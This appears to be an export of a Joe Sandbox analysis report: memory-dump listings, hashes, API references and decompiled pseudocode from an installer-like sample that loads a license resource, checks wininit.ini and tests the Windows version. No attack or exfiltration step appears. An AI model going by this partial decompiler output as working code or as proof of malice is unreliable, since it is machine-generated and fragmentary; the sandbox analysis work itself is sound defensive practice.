                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                                                                                                                                                                                                • String ID: Control Panel\Desktop\ResourceLocale
                                                                                                                                                                                                                                                • API String ID: 3346862599-1109908249
                                                                                                                                                                                                                                                • Opcode ID: fe64abe05bf727a8d5d6e1d5dff7d1301b55655bd57201ee0b61dc7cf375abe4
                                                                                                                                                                                                                                                • Instruction ID: 46a66d22d0a65c32bf2e01e6e5eea3fc4f1cd5d61f73a0168a3ecbdf5a62a744
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fe64abe05bf727a8d5d6e1d5dff7d1301b55655bd57201ee0b61dc7cf375abe4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F3318F31A01228DFEB31CB11EC45BAAB7BCEB45728F1041E5E94DA6240DF359E96CF52
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E00023A3F(void* __eflags) {
                                                                                                                                                                                                                                                				void* _t3;
                                                                                                                                                                                                                                                				void* _t9;
                                                                                                                                                                                                                                                				CHAR* _t16;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t16 = "LICENSE";
                                                                                                                                                                                                                                                				_t1 = E0002468F(_t16, 0, 0) + 1; // 0x1
                                                                                                                                                                                                                                                				_t3 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                                                                				 *0x28d4c = _t3;
                                                                                                                                                                                                                                                				if(_t3 != 0) {
                                                                                                                                                                                                                                                					_t19 = _t16;
                                                                                                                                                                                                                                                					if(E0002468F(_t16, _t3, _t28) != 0) {
                                                                                                                                                                                                                                                						if(lstrcmpA( *0x28d4c, "<None>") == 0) {
                                                                                                                                                                                                                                                							LocalFree( *0x28d4c);
                                                                                                                                                                                                                                                							L9:
                                                                                                                                                                                                                                                							 *0x29124 = 0;
                                                                                                                                                                                                                                                							return 1;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_t9 = E00026517(_t19, 0x7d1, 0, E00023100, 0, 0);
                                                                                                                                                                                                                                                						LocalFree( *0x28d4c);
                                                                                                                                                                                                                                                						if(_t9 != 0) {
                                                                                                                                                                                                                                                							goto L9;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						 *0x29124 = 0x800704c7;
                                                                                                                                                                                                                                                						L2:
                                                                                                                                                                                                                                                						return 0;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					E000244B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                                					LocalFree( *0x28d4c);
                                                                                                                                                                                                                                                					 *0x29124 = 0x80070714;
                                                                                                                                                                                                                                                					goto L2;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				E000244B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                                				 *0x29124 = E00026285();
                                                                                                                                                                                                                                                				goto L2;
                                                                                                                                                                                                                                                			}







                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000246A0
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: SizeofResource.KERNEL32(00000000,00000000,?,00022D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000246A9
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000246C3
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: LoadResource.KERNEL32(00000000,00000000,?,00022D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000246CC
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: LockResource.KERNEL32(00000000,?,00022D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000246D3
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: memcpy_s.MSVCRT ref: 000246E5
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 000246EF
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00022F64,?,00000002,00000000), ref: 00023A5D
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 00023AB3
                                                                                                                                                                                                                                                  • Part of subcall function 000244B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00024518
                                                                                                                                                                                                                                                  • Part of subcall function 000244B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00024554
                                                                                                                                                                                                                                                  • Part of subcall function 00026285: GetLastError.KERNEL32(00025BBC), ref: 00026285
                                                                                                                                                                                                                                                • lstrcmpA.KERNEL32(<None>,00000000), ref: 00023AD0
                                                                                                                                                                                                                                                • LocalFree.KERNEL32 ref: 00023B13
                                                                                                                                                                                                                                                  • Part of subcall function 00026517: FindResourceA.KERNEL32(00020000,000007D6,00000005), ref: 0002652A
                                                                                                                                                                                                                                                  • Part of subcall function 00026517: LoadResource.KERNEL32(00020000,00000000,?,?,00022EE8,00000000,000219E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00026538
                                                                                                                                                                                                                                                  • Part of subcall function 00026517: DialogBoxIndirectParamA.USER32(00020000,00000000,00000547,000219E0,00000000), ref: 00026557
                                                                                                                                                                                                                                                  • Part of subcall function 00026517: FreeResource.KERNEL32(00000000,?,?,00022EE8,00000000,000219E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00026560
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000,00023100,00000000,00000000), ref: 00023AF4
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                                                                                                                                                                                                • String ID: <None>$LICENSE
                                                                                                                                                                                                                                                • API String ID: 2414642746-383193767
                                                                                                                                                                                                                                                • Opcode ID: f0f61e4001060a910060591c3c0e30ad5e23ad0a3773f03a9c08735815824edf
                                                                                                                                                                                                                                                • Instruction ID: f65313b0a53f9e9eb9153008ccfdd09f059760596189680fec43511a162bb65c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f0f61e4001060a910060591c3c0e30ad5e23ad0a3773f03a9c08735815824edf
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4D119A34701221ABF7346F32BC09F5B3AF9DBD5710B20443EBA45D61A1DE7D88168665
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 94%
                                                                                                                                                                                                                                                			E000224E0(void* __ebx) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				char _v268;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				signed int _t7;
                                                                                                                                                                                                                                                				void* _t20;
                                                                                                                                                                                                                                                				long _t26;
                                                                                                                                                                                                                                                				signed int _t27;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t20 = __ebx;
                                                                                                                                                                                                                                                				_t7 =  *0x28004; // 0xf4950d3e
                                                                                                                                                                                                                                                				_v8 = _t7 ^ _t27;
                                                                                                                                                                                                                                                				_t25 = 0x104;
                                                                                                                                                                                                                                                				_t26 = 0;
                                                                                                                                                                                                                                                				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                                					E0002658A( &_v268, 0x104, "wininit.ini");
                                                                                                                                                                                                                                                					WritePrivateProfileStringA(0, 0, 0,  &_v268);
                                                                                                                                                                                                                                                					_t25 = _lopen( &_v268, 0x40);
                                                                                                                                                                                                                                                					if(_t25 != 0xffffffff) {
                                                                                                                                                                                                                                                						_t26 = _llseek(_t25, 0, 2);
                                                                                                                                                                                                                                                						_lclose(_t25);
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return E00026CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
                                                                                                                                                                                                                                                			}












                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00022506
                                                                                                                                                                                                                                                • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 0002252C
                                                                                                                                                                                                                                                • _lopen.KERNEL32 ref: 0002253B
                                                                                                                                                                                                                                                • _llseek.KERNEL32(00000000,00000000,00000002), ref: 0002254C
                                                                                                                                                                                                                                                • _lclose.KERNEL32(00000000), ref: 00022555
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                                                                                                                                                                                                • String ID: wininit.ini
                                                                                                                                                                                                                                                • API String ID: 3273605193-4206010578
                                                                                                                                                                                                                                                • Opcode ID: 142773cf7a090a1827aaf5f9b7c3dddc8b0700906d40680d18883f0554e9b4ff
                                                                                                                                                                                                                                                • Instruction ID: 243bbf3f270a29c50bce97c94769d53d3a9bfa2df41a62990c48275fdb1e32ee
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 142773cf7a090a1827aaf5f9b7c3dddc8b0700906d40680d18883f0554e9b4ff
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AD01B5327011286BD7309B65AC4CEDF7BBCEB46760F100155FA49D3190DE788E56CAA1
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 75%
                                                                                                                                                                                                                                                			E000236EE(CHAR* __ecx) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				char _v268;
                                                                                                                                                                                                                                                				struct _OSVERSIONINFOA _v416;
                                                                                                                                                                                                                                                				signed int _v420;
                                                                                                                                                                                                                                                				signed int _v424;
                                                                                                                                                                                                                                                				CHAR* _v428;
                                                                                                                                                                                                                                                				CHAR* _v432;
                                                                                                                                                                                                                                                				signed int _v436;
                                                                                                                                                                                                                                                				CHAR* _v440;
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				signed int _t72;
                                                                                                                                                                                                                                                				CHAR* _t77;
                                                                                                                                                                                                                                                				CHAR* _t91;
                                                                                                                                                                                                                                                				CHAR* _t94;
                                                                                                                                                                                                                                                				int _t97;
                                                                                                                                                                                                                                                				CHAR* _t98;
                                                                                                                                                                                                                                                				signed char _t99;
                                                                                                                                                                                                                                                				CHAR* _t104;
                                                                                                                                                                                                                                                				signed short _t107;
                                                                                                                                                                                                                                                				signed int _t109;
                                                                                                                                                                                                                                                				short _t113;
                                                                                                                                                                                                                                                				void* _t114;
                                                                                                                                                                                                                                                				signed char _t115;
                                                                                                                                                                                                                                                				short _t119;
                                                                                                                                                                                                                                                				CHAR* _t123;
                                                                                                                                                                                                                                                				CHAR* _t124;
                                                                                                                                                                                                                                                				CHAR* _t129;
                                                                                                                                                                                                                                                				signed int _t131;
                                                                                                                                                                                                                                                				signed int _t132;
                                                                                                                                                                                                                                                				CHAR* _t135;
                                                                                                                                                                                                                                                				CHAR* _t138;
                                                                                                                                                                                                                                                				signed int _t139;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t72 =  *0x28004; // 0xf4950d3e
                                                                                                                                                                                                                                                				_v8 = _t72 ^ _t139;
                                                                                                                                                                                                                                                				_v416.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                                                                				_t115 = __ecx;
                                                                                                                                                                                                                                                				_t135 = 0;
                                                                                                                                                                                                                                                				_v432 = __ecx;
                                                                                                                                                                                                                                                				_t138 = 0;
                                                                                                                                                                                                                                                				if(GetVersionExA( &_v416) != 0) {
                                                                                                                                                                                                                                                					_t133 = _v416.dwMajorVersion;
                                                                                                                                                                                                                                                					_t119 = 2;
                                                                                                                                                                                                                                                					_t77 = _v416.dwPlatformId - 1;
                                                                                                                                                                                                                                                					__eflags = _t77;
                                                                                                                                                                                                                                                					if(_t77 == 0) {
                                                                                                                                                                                                                                                						_t119 = 0;
                                                                                                                                                                                                                                                						__eflags = 1;
                                                                                                                                                                                                                                                						 *0x28184 = 1;
                                                                                                                                                                                                                                                						 *0x28180 = 1;
                                                                                                                                                                                                                                                						L13:
                                                                                                                                                                                                                                                						 *0x29a40 = _t119;
                                                                                                                                                                                                                                                						L14:
                                                                                                                                                                                                                                                						__eflags =  *0x28a34 - _t138; // 0x0
                                                                                                                                                                                                                                                						if(__eflags != 0) {
                                                                                                                                                                                                                                                							goto L66;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						__eflags = _t115;
                                                                                                                                                                                                                                                						if(_t115 == 0) {
                                                                                                                                                                                                                                                							goto L66;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_v428 = _t135;
                                                                                                                                                                                                                                                						__eflags = _t119;
                                                                                                                                                                                                                                                						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
                                                                                                                                                                                                                                                						_t11 =  &_v420;
                                                                                                                                                                                                                                                						 *_t11 = _v420 & _t138;
                                                                                                                                                                                                                                                						__eflags =  *_t11;
                                                                                                                                                                                                                                                						_v440 = _t115;
                                                                                                                                                                                                                                                						do {
                                                                                                                                                                                                                                                							_v424 = _t135 * 0x18;
                                                                                                                                                                                                                                                							_v436 = E00022A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
                                                                                                                                                                                                                                                							_t91 = E00022A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
                                                                                                                                                                                                                                                							_t123 = _v436;
                                                                                                                                                                                                                                                							_t133 = 0x54d;
                                                                                                                                                                                                                                                							__eflags = _t123;
                                                                                                                                                                                                                                                							if(_t123 < 0) {
                                                                                                                                                                                                                                                								L32:
                                                                                                                                                                                                                                                								__eflags = _v420 - 1;
                                                                                                                                                                                                                                                								if(_v420 == 1) {
                                                                                                                                                                                                                                                									_t138 = 0x54c;
                                                                                                                                                                                                                                                									L36:
                                                                                                                                                                                                                                                									__eflags = _t138;
                                                                                                                                                                                                                                                									if(_t138 != 0) {
                                                                                                                                                                                                                                                										L40:
                                                                                                                                                                                                                                                										__eflags = _t138 - _t133;
                                                                                                                                                                                                                                                										if(_t138 == _t133) {
                                                                                                                                                                                                                                                											L30:
                                                                                                                                                                                                                                                											_v420 = _v420 & 0x00000000;
                                                                                                                                                                                                                                                											_t115 = 0;
                                                                                                                                                                                                                                                											_v436 = _v436 & 0x00000000;
                                                                                                                                                                                                                                                											__eflags = _t138 - _t133;
                                                                                                                                                                                                                                                											_t133 = _v432;
                                                                                                                                                                                                                                                											if(__eflags != 0) {
                                                                                                                                                                                                                                                												_t124 = _v440;
                                                                                                                                                                                                                                                											} else {
                                                                                                                                                                                                                                                												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
                                                                                                                                                                                                                                                												_v420 =  &_v268;
                                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                                											__eflags = _t124;
                                                                                                                                                                                                                                                											if(_t124 == 0) {
                                                                                                                                                                                                                                                												_t135 = _v436;
                                                                                                                                                                                                                                                											} else {
                                                                                                                                                                                                                                                												_t99 = _t124[0x30];
                                                                                                                                                                                                                                                												_t135 = _t124[0x34] + 0x84 + _t133;
                                                                                                                                                                                                                                                												__eflags = _t99 & 0x00000001;
                                                                                                                                                                                                                                                												if((_t99 & 0x00000001) == 0) {
                                                                                                                                                                                                                                                													asm("sbb ebx, ebx");
                                                                                                                                                                                                                                                													_t115 =  ~(_t99 & 2) & 0x00000101;
                                                                                                                                                                                                                                                												} else {
                                                                                                                                                                                                                                                													_t115 = 0x104;
                                                                                                                                                                                                                                                												}
                                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                                											__eflags =  *0x28a38 & 0x00000001;
                                                                                                                                                                                                                                                											if(( *0x28a38 & 0x00000001) != 0) {
                                                                                                                                                                                                                                                												L64:
                                                                                                                                                                                                                                                												_push(0);
                                                                                                                                                                                                                                                												_push(0x30);
                                                                                                                                                                                                                                                												_push(_v420);
                                                                                                                                                                                                                                                												_push("lenta");
                                                                                                                                                                                                                                                												goto L65;
                                                                                                                                                                                                                                                											} else {
                                                                                                                                                                                                                                                												__eflags = _t135;
                                                                                                                                                                                                                                                												if(_t135 == 0) {
                                                                                                                                                                                                                                                													goto L64;
                                                                                                                                                                                                                                                												}
                                                                                                                                                                                                                                                												__eflags =  *_t135;
                                                                                                                                                                                                                                                												if( *_t135 == 0) {
                                                                                                                                                                                                                                                													goto L64;
                                                                                                                                                                                                                                                												}
                                                                                                                                                                                                                                                												MessageBeep(0);
                                                                                                                                                                                                                                                												_t94 = E0002681F(_t115);
                                                                                                                                                                                                                                                												__eflags = _t94;
                                                                                                                                                                                                                                                												if(_t94 == 0) {
                                                                                                                                                                                                                                                													L57:
                                                                                                                                                                                                                                                													0x180030 = 0x30;
                                                                                                                                                                                                                                                													L58:
                                                                                                                                                                                                                                                													_t97 = MessageBoxA(0, _t135, "lenta", 0x00180030 | _t115);
                                                                                                                                                                                                                                                													__eflags = _t115 & 0x00000004;
                                                                                                                                                                                                                                                													if((_t115 & 0x00000004) == 0) {
                                                                                                                                                                                                                                                														__eflags = _t115 & 0x00000001;
                                                                                                                                                                                                                                                														if((_t115 & 0x00000001) == 0) {
                                                                                                                                                                                                                                                															goto L66;
                                                                                                                                                                                                                                                														}
                                                                                                                                                                                                                                                														__eflags = _t97 - 1;
                                                                                                                                                                                                                                                														L62:
                                                                                                                                                                                                                                                														if(__eflags == 0) {
                                                                                                                                                                                                                                                															_t138 = 0;
                                                                                                                                                                                                                                                														}
                                                                                                                                                                                                                                                														goto L66;
                                                                                                                                                                                                                                                													}
                                                                                                                                                                                                                                                													__eflags = _t97 - 6;
                                                                                                                                                                                                                                                													goto L62;
                                                                                                                                                                                                                                                												}
                                                                                                                                                                                                                                                												_t98 = E000267C9(_t124, _t124);
                                                                                                                                                                                                                                                												__eflags = _t98;
                                                                                                                                                                                                                                                												if(_t98 == 0) {
                                                                                                                                                                                                                                                													goto L57;
                                                                                                                                                                                                                                                												}
                                                                                                                                                                                                                                                												goto L58;
                                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                										__eflags = _t138 - 0x54c;
                                                                                                                                                                                                                                                										if(_t138 == 0x54c) {
                                                                                                                                                                                                                                                											goto L30;
                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                										__eflags = _t138;
                                                                                                                                                                                                                                                										if(_t138 == 0) {
                                                                                                                                                                                                                                                											goto L66;
                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                										_t135 = 0;
                                                                                                                                                                                                                                                										__eflags = 0;
                                                                                                                                                                                                                                                										goto L44;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                									L37:
                                                                                                                                                                                                                                                									_t129 = _v432;
                                                                                                                                                                                                                                                									__eflags = _t129[0x7c];
                                                                                                                                                                                                                                                									if(_t129[0x7c] == 0) {
                                                                                                                                                                                                                                                										goto L66;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                									_t133 =  &_v268;
                                                                                                                                                                                                                                                									_t104 = E000228E8(_t129,  &_v268, _t129,  &_v428);
                                                                                                                                                                                                                                                									__eflags = _t104;
                                                                                                                                                                                                                                                									if(_t104 != 0) {
                                                                                                                                                                                                                                                										goto L66;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                									_t135 = _v428;
                                                                                                                                                                                                                                                									_t133 = 0x54d;
                                                                                                                                                                                                                                                									_t138 = 0x54d;
                                                                                                                                                                                                                                                									goto L40;
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                								goto L33;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							__eflags = _t91;
                                                                                                                                                                                                                                                							if(_t91 > 0) {
                                                                                                                                                                                                                                                								goto L32;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							__eflags = _t123;
                                                                                                                                                                                                                                                							if(_t123 != 0) {
                                                                                                                                                                                                                                                								__eflags = _t91;
                                                                                                                                                                                                                                                								if(_t91 != 0) {
                                                                                                                                                                                                                                                									goto L37;
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
                                                                                                                                                                                                                                                								L27:
                                                                                                                                                                                                                                                								if(__eflags <= 0) {
                                                                                                                                                                                                                                                									goto L37;
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                								L28:
                                                                                                                                                                                                                                                								__eflags = _t135;
                                                                                                                                                                                                                                                								if(_t135 == 0) {
                                                                                                                                                                                                                                                									goto L33;
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                								_t138 = 0x54c;
                                                                                                                                                                                                                                                								goto L30;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							__eflags = _t91;
                                                                                                                                                                                                                                                							_t107 = _v416.dwBuildNumber;
                                                                                                                                                                                                                                                							if(_t91 != 0) {
                                                                                                                                                                                                                                                								_t131 = _v424;
                                                                                                                                                                                                                                                								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
                                                                                                                                                                                                                                                								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
                                                                                                                                                                                                                                                									goto L37;
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                								goto L28;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							_t132 = _t107 & 0x0000ffff;
                                                                                                                                                                                                                                                							_t109 = _v424;
                                                                                                                                                                                                                                                							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
                                                                                                                                                                                                                                                							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
                                                                                                                                                                                                                                                								goto L28;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
                                                                                                                                                                                                                                                							goto L27;
                                                                                                                                                                                                                                                							L33:
                                                                                                                                                                                                                                                							_t135 =  &(_t135[1]);
                                                                                                                                                                                                                                                							_v428 = _t135;
                                                                                                                                                                                                                                                							_v420 = _t135;
                                                                                                                                                                                                                                                							__eflags = _t135 - 2;
                                                                                                                                                                                                                                                						} while (_t135 < 2);
                                                                                                                                                                                                                                                						goto L36;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					__eflags = _t77 == 1;
                                                                                                                                                                                                                                                					if(_t77 == 1) {
                                                                                                                                                                                                                                                						 *0x29a40 = _t119;
                                                                                                                                                                                                                                                						 *0x28184 = 1;
                                                                                                                                                                                                                                                						 *0x28180 = 1;
                                                                                                                                                                                                                                                						__eflags = _t133 - 3;
                                                                                                                                                                                                                                                						if(_t133 > 3) {
                                                                                                                                                                                                                                                							__eflags = _t133 - 5;
                                                                                                                                                                                                                                                							if(_t133 < 5) {
                                                                                                                                                                                                                                                								goto L14;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							_t113 = 3;
                                                                                                                                                                                                                                                							_t119 = _t113;
                                                                                                                                                                                                                                                							goto L13;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_t119 = 1;
                                                                                                                                                                                                                                                						_t114 = 3;
                                                                                                                                                                                                                                                						 *0x29a40 = 1;
                                                                                                                                                                                                                                                						__eflags = _t133 - _t114;
                                                                                                                                                                                                                                                						if(__eflags < 0) {
                                                                                                                                                                                                                                                							L9:
                                                                                                                                                                                                                                                							 *0x28184 = _t135;
                                                                                                                                                                                                                                                							 *0x28180 = _t135;
                                                                                                                                                                                                                                                							goto L14;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						if(__eflags != 0) {
                                                                                                                                                                                                                                                							goto L14;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						__eflags = _v416.dwMinorVersion - 0x33;
                                                                                                                                                                                                                                                						if(_v416.dwMinorVersion >= 0x33) {
                                                                                                                                                                                                                                                							goto L14;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						goto L9;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					_t138 = 0x4ca;
                                                                                                                                                                                                                                                					goto L44;
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					_t138 = 0x4b4;
                                                                                                                                                                                                                                                					L44:
                                                                                                                                                                                                                                                					_push(_t135);
                                                                                                                                                                                                                                                					_push(0x10);
                                                                                                                                                                                                                                                					_push(_t135);
                                                                                                                                                                                                                                                					_push(_t135);
                                                                                                                                                                                                                                                					L65:
                                                                                                                                                                                                                                                					_t133 = _t138;
                                                                                                                                                                                                                                                					E000244B9(0, _t138);
                                                                                                                                                                                                                                                					L66:
                                                                                                                                                                                                                                                					return E00026CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                			}





































                                                                                                                                                                                                                                                0x000239ba
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000239bc
                                                                                                                                                                                                                                                0x000239bf
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000239c3
                                                                                                                                                                                                                                                0x000239c9
                                                                                                                                                                                                                                                0x000239ce
                                                                                                                                                                                                                                                0x000239d0
                                                                                                                                                                                                                                                0x000239e3
                                                                                                                                                                                                                                                0x000239e5
                                                                                                                                                                                                                                                0x000239e6
                                                                                                                                                                                                                                                0x000239f1
                                                                                                                                                                                                                                                0x000239f7
                                                                                                                                                                                                                                                0x000239fa
                                                                                                                                                                                                                                                0x00023a01
                                                                                                                                                                                                                                                0x00023a04
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023a06
                                                                                                                                                                                                                                                0x00023a09
                                                                                                                                                                                                                                                0x00023a09
                                                                                                                                                                                                                                                0x00023a0b
                                                                                                                                                                                                                                                0x00023a0b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023a09
                                                                                                                                                                                                                                                0x000239fc
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000239fc
                                                                                                                                                                                                                                                0x000239d3
                                                                                                                                                                                                                                                0x000239d8
